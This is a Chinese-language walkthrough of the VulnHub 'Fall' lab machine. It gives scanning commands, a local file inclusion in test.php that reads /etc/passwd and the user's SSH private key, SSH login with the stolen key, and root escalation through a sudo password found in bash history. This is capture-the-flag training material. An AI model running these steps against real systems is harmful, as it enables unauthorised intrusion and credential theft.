OSCP难度靶机之FALL
2022-9-29 09:4:46 Author: 安全孺子牛(查看原文) 阅读量:5 收藏

虚拟机信息:虚拟机下载地址:https://www.vulnhub.com/entry/digitalworldlocal-fall,726/虚拟机简介:作者最喜欢的季节,因为它是收获的季节目标:1个flag级别:中级

1、信息收集

1.1 通过netdiscover检测主机IP地址

arp-scan 192.168.207.0/24

1.2 通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.131

查看开放22、80、111、139、443等多个端口

2、渗透测试

2.1 站点渗透

1.访问WEB站点

发现存在一个账号qiu

2.查看CMS版本

查看CMS为 CMS Made Simple ,版本为2.2.15

搜索漏洞,发现XSS和文件上传,需要认证成功后才能执行

3.使用gobuster进行爆破

gobuster dir -u http://192.168.207.131 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt

4.测试访问test.php

提示需要在get请求中传入参数

测试需要传参的内容,获取到参数为file

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://192.168.207.131/test.php?FUZZ=/etc/passwd' -fs 80

5.通过file参数获取密码

curl http://192.168.207.131/test.php?file=/etc/passwd

查看存在qiu账号,并且允许登录

6.获取qiu账号的登录密钥

curl http://192.168.207.131/test.php?file=/home/qiu/.ssh/id_rsa

7.保存密钥文件并修改权限

curl http://192.168.207.131/test.php?file=/home/qiu/.ssh/id_rsa >> id_rsa
chmod 600 id_rsa
ssh -i id_rsa [email protected]

3.提权

1.本地提权

1.查看历史命令

以前执行过sudo命令,密码为:remarkablyawesomE

cat .bash_history

2.查看sudo权限

该用户拥有所有的sudo权限

sudo -l

3.执行sudo提权

sudo su

4.查看flag

cd /root
cat proof.txt


文章来源: http://mp.weixin.qq.com/s?__biz=MzI2MDI0NTM2Nw==&mid=2247488681&idx=1&sn=6876d7e0dcf05d091528fbdb87dcf30e&chksm=ea6dc6b1dd1a4fa734c224cb319683cc36263c3ae2c07cd9e4ce3db728a80f10ecc035fa88d9#rd
如有侵权请联系:admin#unsafe.sh